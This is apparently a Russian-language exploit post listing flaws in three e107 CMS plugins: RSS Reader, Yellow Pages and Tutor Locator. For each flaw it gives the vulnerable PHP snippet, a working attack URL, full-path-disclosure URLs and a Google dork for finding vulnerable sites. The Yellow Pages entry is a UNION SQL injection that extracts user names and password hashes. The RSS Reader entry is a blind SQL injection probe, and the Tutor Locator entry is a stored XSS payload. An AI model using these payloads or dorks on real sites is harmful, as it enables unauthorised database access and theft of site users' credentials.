RSS Reader v1.10 Blind SQL Injection: /include/getrss.php PHP: ... $q=$_GET["q"]; ... $sql->DB_Select("rss_reader","rss_feed_addr","rss_feed_id=".$q); ... Пример: Code: http://e107/e107_plugins/rss_reader/include/getrss.php?q=2%20and%20substring(version(),1,1)=5 Путь: http://e107/e107_plugins/rss_reader/admin_menu.php Дорк:inurl:e107_plugins/rss_reader/
Yellow Pages v2.0 b1 SQL Injection: /yellowpages.php Пример: Code: http://e107/e107_plugins/yellowpages/yellowpages.php?1.-2%20union%20select%201,concat_ws(0x3a,user_name,user_password),3,4,5,6,7,8,9,10,11,12%20from%20e107_user-- Путь: http://e107/e107_plugins/yellowpages/admin_menu.php http://e107/e107_plugins/yellowpages/admin_prefs_90.php http://e107/e107_plugins/yellowpages/admin_update.php http://e107/e107_plugins/yellowpages/e_list.php http://e107/e107_plugins/yellowpages/e_search.php etc.. Дорк:inurl:e107_plugins/yellowpages/
Tutor Locator v1.1 Stored XSS: /tutor.php PHP: { $pid = (IsSet($_POST['pid']) ? $_POST['pid'] : 0); $tmp = explode(".", e_QUERY); $tutor_from = intval($tmp[0]); $tutor_action = "item"; $tutor_itemid = intval($tmp[4]); $tutor_com->enter_comment($_POST['author_name'], $_POST['comment'], "tutor", $tutor_itemid, $pid, $_POST['subject']); // print $tutor_action.$tutor_itemid; } Снизу есть форма отправки комментария; вписываем "<script>alert('xss')</script>" и.. любуемся. Комментарий сохраняется и показывается всем, кто откроет страницу, — это хранимая XSS. author_name, subject и pid уходят в enter_comment так же без обработки (в отличие от tutor_from и tutor_itemid, которые приводятся через intval()), так что проверьте и их; экранирование — или его отсутствие — находится в обработчике комментариев, которого в фрагменте нет. Путь (раскрытие полного пути при display_errors=On): http://e107/e107_plugins/tutor/tutor_top_menu.php Дорк: inurl:e107_plugins/tutor/